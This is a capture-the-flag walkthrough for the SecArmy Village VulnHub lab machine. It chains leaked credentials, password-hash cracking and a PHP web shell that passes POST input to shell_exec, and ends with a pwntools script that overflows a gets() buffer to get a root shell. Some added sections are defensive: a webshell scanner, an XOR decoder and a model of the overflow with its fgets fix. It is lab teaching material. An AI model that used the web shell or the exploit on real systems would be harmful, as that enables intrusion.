SECARMY VILLAGE: GRAYHAT CONFERENCE

Posted by xdeclearn on 2020-11-14


VM download: https://download.vulnhub.com/secarmyvillage/SECARMY-VILLAGE-OSCP-GIVEAWAY.ova

Host discovery and port scanning are omitted here; writing them out every time would be redundant.

flag1

Port 80 shows nothing of value, so first run dirb against it to enumerate directories.

---- Scanning URL: http://192.168.132.141/ ----
==> DIRECTORY: http://192.168.132.141/anon/                                                                           
+ http://192.168.132.141/index.html (CODE:200|SIZE:267)                                                               
==> DIRECTORY: http://192.168.132.141/javascript/                                                                     
+ http://192.168.132.141/server-status (CODE:403|SIZE:280)                                                            

Entering the anon directory and inspecting the page source gives the first user's credentials; logging in over SSH yields flag1.

Welcome to the hidden directory! <br>
<br>
Here are your credentials to make your way into the machine!
<br>
<br>
<font color="white">uno:luc10r4m0n</font>
kali@kali:~$ ssh uno@192.168.132.141
The authenticity of host '192.168.132.141 (192.168.132.141)' can't be established.
ECDSA key fingerprint is SHA256:+KBxMeqxgG6NngNoJwwS2riM4d1vvmOUVunnIyNS8I8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.132.141' (ECDSA) to the list of known hosts.
uno@192.168.132.141's password: 
 ________  _______   ________  ________  ________  _____ ______       ___    ___ 
|\   ____\|\  ___ \ |\   ____\|\   __  \|\   __  \|\   _ \  _   \    |\  \  /  /|
\ \  \___|\ \   __/|\ \  \___|\ \  \|\  \ \  \|\  \ \  \\\__\ \  \   \ \  \/  / /
 \ \_____  \ \  \_|/_\ \  \    \ \   __  \ \   _  _\ \  \\|__| \  \   \ \    / / 
  \|____|\  \ \  \_|\ \ \  \____\ \  \ \  \ \  \\  \\ \  \    \ \  \   \/  /  /  
    ____\_\  \ \_______\ \_______\ \__\ \__\ \__\\ _\\ \__\    \ \__\__/  / /    
   |\_________\|_______|\|_______|\|__|\|__|\|__|\|__|\|__|     \|__|\___/ /     
   \|_________|                                                     \|___|/      
                                                                                 
                                                                                 
 ___      ___ ___  ___       ___       ________  ________  _______               
|\  \    /  /|\  \|\  \     |\  \     |\   __  \|\   ____\|\  ___ \              
\ \  \  /  / | \  \ \  \    \ \  \    \ \  \|\  \ \  \___|\ \   __/|             
 \ \  \/  / / \ \  \ \  \    \ \  \    \ \   __  \ \  \  __\ \  \_|/__           
  \ \    / /   \ \  \ \  \____\ \  \____\ \  \ \  \ \  \|\  \ \  \_|\ \          
   \ \__/ /     \ \__\ \_______\ \_______\ \__\ \__\ \_______\ \_______\         
    \|__|/       \|__|\|_______|\|_______|\|__|\|__|\|_______|\|_______|         
                                                                                 
                                                                                 
WELCOME TO THE SECARMY OSCP GIVEAWAY MACHINE!,

https://secarmy.org/village/

THIS MACHINE HAS BEEN MADE AS PART OF THE SECARMY VILLAGE 
EVENT AND IS SPONSOSRED BY OUR GENEROUS SPONSOR OFFENSIVE
SECURITY. YOU ARE REQUIRED TO COMPLETE 10 TASKS IN ORDER TO 
GET THE ROOT FLAG. MAKE SURE THAT YOU JOIN OUR DISCORD SERVER
(bit.ly/joinsecarmy) IN ORDER TO SUBMIT THE FLAG AS WELL AS 
FOR SOLVING YOUR PROBLEMS OR QUERIES...

GOODLUCK!
uno@svos:~$ ls
flag1.txt  readme.txt
uno@svos:~$ cat flag1.txt
Congratulations!
Here's your first flag segment: flag1{fb9e88}

flag2

The hint file readme.txt provided here gives the second user's password.

uno@svos:~$ cat readme.txt 
Head over to the second user!
You surely can guess the username , the password will be:
4b3l4rd0fru705
uno@svos:~$ cat /etc/passwd|grep bin/bash
root:x:0:0:root:/root:/bin/bash
uno:x:1001:1001:,,,:/home/uno:/bin/bash
dos:x:1002:1002:,,,:/home/dos:/bin/bash
tres:x:1003:1003:,,,:/home/tres:/bin/bash
cuatro:x:1004:1004:,,,:/home/cuatro:/bin/bash
cinco:x:1005:1005:,,,:/home/cinco:/bin/bash
seis:x:1006:1006:,,,:/home/seis:/bin/bash
siete:x:1007:1007:,,,:/home/siete:/bin/bash
ocho:x:1008:1008:,,,:/home/ocho:/bin/bash
nueve:x:1009:1009:,,,:/home/nueve:/bin/bash
cero:x:1000:1000:,,,:/home/cero:/bin/bash

The username is dos; switching to that user with the password above gives another hint file, readme.txt.

uno@svos:~$ su - dos
Password: 
dos@svos:~$ ls
1337.txt  files  readme.txt
dos@svos:~$ cat readme.txt 
You are required to find the following string inside the files folder:
a8211ac1853a1235d48829414626512a

Locating the matching file in the files directory points us on to file3131.txt.

dos@svos:~$ grep -R a8211ac1853a1235d48829414626512a ./files/
./files/file4444.txt:a8211ac1853a1235d48829414626512a
dos@svos:~$ cat files/file4444.txt 
.......
a8211ac1853a1235d48829414626512a
Look inside file3131.txt

The end of file3131.txt contains a block of base64 text (not reproduced here). Base64-decoding its first line shows that the first two characters are PK, which suggests a zip file, so a simple script rewrites the whole block as 1.zip.

#!/usr/bin/python3
import base64

# The base64 text from the end of file3131.txt; only the first line is kept
# here, the remaining lines are elided.
codes = '''UEsDBBQDAAAAADOiO1EAAAAAAAAAAAAAAAALAAAAY2hhbGxlbmdlMi9QSwMEFAMAAAgAFZI2Udrg
...'''

# Join the lines before decoding so the result does not depend on every line
# being a multiple of four characters, then write the raw bytes out as a zip.
with open('1.zip', 'wb') as f:
    f.write(base64.b64decode(''.join(codes.split())))

dos@svos:~$ unzip 1.zip 
Archive:  1.zip
   creating: challenge2/
  inflating: challenge2/flag2.txt    
  inflating: challenge2/todo.txt 

dos@svos:~/challenge2$ cat flag2.txt 
Congratulations!

Here's your second flag segment: flag2{624a21}
dos@svos:~/challenge2$ cat todo.txt 
Although its total WASTE but... here's your super secret token: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b

flag3

Connect directly with nc to local port 1337, enter the token, and the third user's password comes back.

dos@svos:~/challenge2$ nc 127.0.0.1 1337

 Welcome to SVOS Password Recovery Facility!
 Enter the super secret token to proceed: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b

 Here's your login credentials for the third user tres:r4f43l71n4j3r0 
dos@svos:~/challenge2$ su - tres
Password: 
tres@svos:~$ ls
a.out  flag3.txt  readme.txt  secarmy-village
tres@svos:~$ cat flag3.txt 
Congratulations! Here's your third flag segment: flag3{ac66cf}
tres@svos:~$ cat readme.txt 
A collection of conditionals has been added in the secarmy-village binary present in this folder reverse it and get the fourth user's credentials , if you have any issues with accessing the file you can head over to: https://mega.nz/file/XodTiCJD#YoLtnkxzRe_BInpX6twDn_LFQaQVnjQufFj3Hn1iEyU

flag4

Following the hint, strings on secarmy-village shows the binary is UPX-packed; unpack it first, then run strings again to find cuatro's password, which logs in successfully.

kali@kali:~$ upx -d secarmy-village 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     53496 <-     20348   38.04%   linux/amd64   secarmy-village

Unpacked 1 file.
kali@kali:~$ strings secarmy-village|grep cuatro
Here's the credentials for the fourth user cuatro:p3dr00l1v4r3z

cuatro@svos:~$ cat flag4.txt
Congratulations, here's your 4th flag segment: flag4{1d6b06}

flag5

cuatro@svos:~$ cat todo.txt 
We have just created a new web page for our upcoming platform, its a photo gallery. You can check them out at /justanothergallery on the webserver.

Following the hint, /var/www/html/justanothergallery/qr holds a pile of QR codes; the information clearly lives in them, so a small script using pyzbar[1] decodes them all, giving cinco's password and flag5.

#!/usr/bin/python3
import pyzbar.pyzbar as pyzbar
from PIL import Image

# The gallery holds image-0.png .. image-67.png; decode every QR code and
# print its payload so the credential line can be grepped out.
for number in range(0, 68):
    fileName = 'qr/image-{}.png'.format(number)
    img = Image.open(fileName)
    barcodes = pyzbar.decode(img)
    for barcode in barcodes:
        barcodeData = barcode.data.decode('utf-8')
        print(barcodeData)

kali@kali:~/Desktop$ python3 test.py |grep cinco
cinco:ruy70m35
cinco@svos:~$ cat flag5.txt 
Congratulations! Here's your 5th flag segment: flag5{b1e870}

flag6

Check the hint, search for every file owned by cinco, find the password file, crack it as the hint suggests (rockyou) to get seis's password, and collect flag6.

cinco@svos:~$ cat readme.txt 
Check for Cinco's secret place somewhere outside the house
cinco@svos:~$ find / -user cinco 2>/dev/null
/sys/fs/cgroup/systemd/user.slice/user-1005.slice/user@1005.service
/sys/fs/cgroup/systemd/user.slice/user-1005.slice/user@1005.service/cgroup.procs
......
/cincos-secrets
/cincos-secrets/shadow.bak
/cincos-secrets/hint.txt
cinco@svos:~$ cat /cincos-secrets/hint.txt 
we will, we will, ROCKYOU..!!!
cinco@svos:~$ cat /cincos-secrets/shadow.bak 
daemon:*:18380:0:99999:7:::
......
seis:$6$MCzqLn0Z2KB3X3TM$opQCwc/JkRGzfOg/WTve8X/zSQLwVf98I.RisZCFo0mTQzpvc5zqm/0OJ5k.PITcFJBnsn7Nu2qeFP8zkBwx7.:18532:0:99999:7:::

$6$MCzqLn0Z2KB3X3TM$opQCwc/JkRGzfOg/WTve8X/zSQLwVf98I.RisZCFo0mTQzpvc5zqm/0OJ5k.PITcFJBnsn7Nu2qeFP8zkBwx7.:Hogwarts

cinco@svos:~$ su - seis
Password: 
seis@svos:~$ cat flag6.txt 
Congratulations! Here's your 6th flag segment: flag6{779a25}

flag7

Enter the hinted directory.

seis@svos:/var/www/html/shellcmsdashboard$ ls -all
total 24
drwxrwxrwx 2 root     root 4096 Nov 13 20:44 .
drwxr-xr-x 5 root     root 4096 Oct  8 17:51 ..
-rwxrwxrwx 1 root     root 1459 Oct  1 17:57 aabbzzee.php
-rwxrwxrwx 1 root     root 1546 Oct 18 15:02 index.php
-rwx-wx-wx 1 www-data root   48 Oct  8 17:54 readme9213.txt
-rwxrwxrwx 1 root     root   58 Oct  1 17:37 robots.txt

readme9213.txt can only be read as www-data, so look at aabbzzee.php next.

<?php
    if(isset($_POST['comm']))
    {
        $cmd = $_POST['comm'];
        echo "<center>";
        echo shell_exec($cmd);
        echo"</center>";
    }
?>

Using this PHP page to run the command below reads the txt file and yields siete's password, 6u1l3rm0p3n473.
cat readme9213.txt
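A defender's view of aabbzzee.php, as an added example that is not part of the original post: a small scanner that flags PHP files in a webroot where a request parameter reaches a command-execution function. The two sample files and the regex patterns are constructed here; the scanner writes them to a temporary directory so it runs offline.

```python
import re
import stat
import tempfile
from pathlib import Path

# Constructed samples: the command-execution page seen on the machine and a
# harmless page that reads a parameter but never runs a command.
WEBSHELL_PHP = """<?php
    if(isset($_POST['comm']))
    {
        $cmd = $_POST['comm'];
        echo "<center>";
        echo shell_exec($cmd);
        echo"</center>";
    }
?>"""
BENIGN_PHP = "<?php echo 'Hello, ' . htmlspecialchars($_GET['name']); ?>"

EXEC_FUNCS = re.compile(r"\b(shell_exec|system|exec|passthru|popen|proc_open)\s*\(")
USER_INPUT = re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\b")

def classify_source(text: str) -> dict:
    """Does the source call an exec-style function, and does it read request data?"""
    return {"exec_call": bool(EXEC_FUNCS.search(text)),
            "user_input": bool(USER_INPUT.search(text))}

def scan_php(path: Path) -> dict:
    """Per-file finding: classification plus world-writable bit (the listing showed -rwxrwxrwx)."""
    finding = classify_source(path.read_text(errors="replace"))
    finding["path"] = str(path)
    finding["world_writable"] = bool(path.stat().st_mode & stat.S_IWOTH)
    return finding

def scan_webroot(root: Path) -> list:
    """Return findings for every PHP file where user input meets an exec call."""
    hits = []
    for php in sorted(root.rglob("*.php")):
        finding = scan_php(php)
        if finding["exec_call"] and finding["user_input"]:
            hits.append(finding)
    return hits

def demo() -> list:
    """Write the two samples into a temporary webroot and scan it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "aabbzzee.php").write_text(WEBSHELL_PHP)
        (root / "index.php").write_text(BENIGN_PHP)
        return [Path(f["path"]).name for f in scan_webroot(root)]
```

Running scan_webroot over a real document root lists every file to inspect by hand; the world_writable flag is the second signal worth acting on here, since the directory permissions let anyone drop such a file.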

siete@svos:~$ ls
flag7.txt  hint.txt  key.txt  message.txt  mighthelp.go  password.zip
siete@svos:~$ cat flag7.txt
Congratulations!
Here's your 7th flag segment: flag7{d5c26a}

flag8

siete@svos:~$ cat hint.txt 
Base 10 and Base 256 result in Base 256!
siete@svos:~$ cat key.txt 
x
siete@svos:~$ cat message.txt 
[11 29 27 25 10 21 1 0 23 10 17 12 13 8]
siete@svos:~$ cat mighthelp.go 
package main import(
        "fmt" ) func main() {
        var chars =[]byte{}
        str1 := string(chars)
        fmt.println(str1)
}

Going by the hint, how can AND-ing base 10 with base 256 still give base 256? 256 as a single hex byte is 00, so the operation can only be XOR; XOR-ing the key with the array gives the extraction password for password.zip, secarmyxoritup.

>>> ''.join(chr(ord('x')^key) for key in [11,29,27,25,10,21,1,0,23,10,17,12,13,8])
'secarmyxoritup'
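The single-byte XOR above, as an added example that is not from the original post: it reproduces the decode with key 'x' and also ranks all 256 possible single-byte keys by how letter-like the output is, which is the recovery step needed if key.txt had not been handed over. The message and key come from the page; the scoring heuristic is an assumption of this example.

```python
import string

# Constructed from message.txt and key.txt above: the 14 numbers are the
# ciphertext bytes, the key is the single byte 'x'.
MESSAGE = bytes([11, 29, 27, 25, 10, 21, 1, 0, 23, 10, 17, 12, 13, 8])
KEY = b"x"

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key (a single-byte key is this page's case)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def score(candidate: bytes) -> int:
    """Crude plaintext scorer: count bytes that are lowercase ASCII letters or
    space. Enough to separate the real key from keys that map the same
    message into symbols or mixed case."""
    letters = set(string.ascii_lowercase.encode() + b" ")
    return sum(1 for b in candidate if b in letters)

def rank_single_byte_keys(data: bytes) -> list:
    """Try all 256 single-byte keys and return (key, plaintext) pairs, best first."""
    results = [(k, xor_bytes(data, bytes([k]))) for k in range(256)]
    return sorted(results, key=lambda kv: score(kv[1]), reverse=True)

def recover_password(data: bytes = MESSAGE) -> str:
    """Password from the best-scoring key, without being told the key."""
    key, plaintext = rank_single_byte_keys(data)[0]
    return plaintext.decode("ascii")

if __name__ == "__main__":
    key, plaintext = rank_single_byte_keys(MESSAGE)[0]
    print(f"key=0x{key:02x} ({chr(key)!r}) plaintext={plaintext.decode()!r}")
```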

This yields the next user ocho's password, m0d3570v1ll454n4, and with it flag8.

ocho@svos:~$ cat flag8.txt 
Congratulations!
Here's your 8th flag segment: flag8{5bcf53}

flag9

Analysing keyboard.pcapng in Wireshark locates the key packet.
qwerty
Exporting it as a short text file reveals the key string mjwfr?2b6j3a5fx/; given what the text is about, decoding it with the Keyboard Shift Decoder[2] gives nueve's password 355u4z4rc0, and with it flag9.

QWERTY is a keyboard design for Latin-script alphabets. The name comes from the order of the first six keys on the top left letter row of the keyboard. The QWERTY design is based on a layout created for the Sholes and Glidden typewriter and sold to E. Remington and Sons in 1873. Why was the QWERTY 
......
The striker lockup came when a typist quickly typed a succession of letters on the same type bars and the strikers were adjacent to each other. There was a higher possibility for the keys to become jammed. READING IS NOT IMPORTANT, HERE IS WHAT YOU WANT: "mjwfr?2b6j3a5fx/" if the sequence was not perfectly timed. The theory presents that Sholes redesigned the type bar so as to separate the most common sequences of letters: "th", "he" and others from causing a jam.
......


nueve@svos:~$ cat flag9.txt 
Congratulations!
Here's your 9th flag segment: flag9{689d3e}

flag10

Decompile the program orangutan found in the user's home directory.

undefined8 main(void)

{
  char local_28 [24];
  long local_10;
  
  local_10 = 0;
  setbuf(stdout,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  puts("hello pwner ");
  puts("pwnme if u can ;) ");
  gets(local_28);
  if (local_10 == 0xcafebabe) {
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh",(char **)0x0);
  }
  return 0;
}

As can be seen, gets can be used to overwrite local_10 with 0xcafebabe and obtain a root shell, as follows:

  1. Start orangutan remotely via socat:
nueve@svos:~$ socat TCP-LISTEN:8000 EXEC:./orangutan
  2. Run the pwn script locally:
kali@kali:~$ cat test.py 
from pwn import *
offset = b"A" * 24              # fill local_28[24]
secret = b"\xbe\xba\xfe\xca"    # 0xcafebabe, little-endian, lands in local_10
payload = offset + secret
io = remote('192.168.132.141', 8000)
print(io.recvline())            # "hello pwner "
print(io.recvline())            # "pwnme if u can ;) "
io.sendline(payload)
io.interactive()
kali@kali:~$ python3 test.py 
[+] Opening connection to 192.168.132.141 on port 8000: Done
b'hello pwner \n'
b'pwnme if u can ;) \n'
[*] Switching to interactive mode
$ id
uid=0(root) gid=0(root) groups=0(root),1009(nueve)
$ pwd
/home/nueve
$ cd /root
$ ls -all
total 76
drwx------  8 root root  4096 Oct 22 09:22 .
drwxr-xr-x 25 root root  4096 Oct 18 14:42 ..
-rw-r--r--  1 root root  3106 Apr  9  2018 .bashrc
drwx------  4 root root  4096 Oct  7 14:09 .cache
drwx------  2 root root  4096 Sep 25 11:48 .elinks
drwxr-xr-x  3 root root  4096 Oct  5 08:39 .gem
drwx------  3 root root  4096 Oct  7 14:09 .gnupg
drwxr-xr-x  3 root root  4096 Sep 22 11:21 .local
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
-rwxrwxr-x  1 tres tres    73 Sep 27 14:23 pw.sh
-rw-r--r--  1 root root   200 Oct 20 17:48 root.txt
-rw-r--r--  1 root root    66 Sep 27 14:31 .selected_editor
drwx------  2 root root  4096 Sep 22 11:19 .ssh
-rwxr-xr-x  1 root root 18792 Oct 21 17:49 svos_password_recovery
-rw-------  1 root root  1250 Oct  7 14:31 .viminfo
$ cat root.txt
Congratulations!!!

You have finally completed the SECARMY OSCP Giveaway Machine

Here's your final flag segment: flag10{33c9661bfd}

Head over to https://secarmyvillage.ml/ for submitting the flags!
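The overwrite in orangutan, modelled as an added example that is not part of the original post: it derives the 24-byte distance from the Ghidra variable names local_28 and local_10, simulates what gets() and a bounded fgets() do to that frame, and shows why sending only four bytes of 0xcafebabe is enough. The frame model and the helper names are assumptions of this example.

```python
import struct

# Names and sizes from the decompiler output above: char local_28[24]; long local_10.
BUFFER_NAME, TARGET_NAME = "local_28", "local_10"
BUF_SIZE, LONG_SIZE = 24, 8
MAGIC = 0xCAFEBABE

def ghidra_distance(buf_name: str, target_name: str) -> int:
    """Ghidra names stack locals by their offset below the frame base:
    local_28 is at rbp-0x28 and local_10 at rbp-0x10, so their difference is
    how many bytes gets() writes before it reaches local_10."""
    return int(buf_name.split("_")[1], 16) - int(target_name.split("_")[1], 16)

def fresh_frame() -> bytearray:
    """Model of the part of main()'s frame that matters: the 24-byte buffer
    followed by local_10, which the program initialises to 0."""
    return bytearray(BUF_SIZE + LONG_SIZE)

def read_target(frame: bytearray) -> int:
    """Read local_10 as the 8-byte little-endian long it is."""
    off = ghidra_distance(BUFFER_NAME, TARGET_NAME)
    return struct.unpack("<q", frame[off:off + LONG_SIZE])[0]

def sim_gets(frame: bytearray, line: bytes) -> bytearray:
    """gets(): copies the whole line plus a NUL with no bound at all."""
    data = line + b"\x00"
    frame[:len(data)] = data
    return frame

def sim_fgets(frame: bytearray, line: bytes, size: int) -> bytearray:
    """fgets(buf, size, stdin): at most size-1 bytes plus a NUL, so with
    size == sizeof(buf) it cannot touch local_10."""
    data = line[:size - 1] + b"\x00"
    frame[:len(data)] = data
    return frame

def page_payload() -> bytes:
    """The walkthrough's input: 24 filler bytes then 0xcafebabe little-endian.
    Four bytes suffice: the NUL from gets() and the zero-initialised upper
    half of the long leave local_10 exactly 0xcafebabe."""
    return b"A" * ghidra_distance(BUFFER_NAME, TARGET_NAME) + struct.pack("<I", MAGIC)

def target_after_gets(line: bytes = None) -> int:
    return read_target(sim_gets(fresh_frame(), page_payload() if line is None else line))

def target_after_fgets(line: bytes = None) -> int:
    return read_target(sim_fgets(fresh_frame(), page_payload() if line is None else line, BUF_SIZE))
```

The fgets variant is the fix: with the read bounded to sizeof(local_28), local_10 keeps its initial value whatever the input length.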

References

  • [1] https://blog.csdn.net/qq_39903576/article/details/86710862
  • [2] https://www.dcode.fr/keyboard-shift-cipher
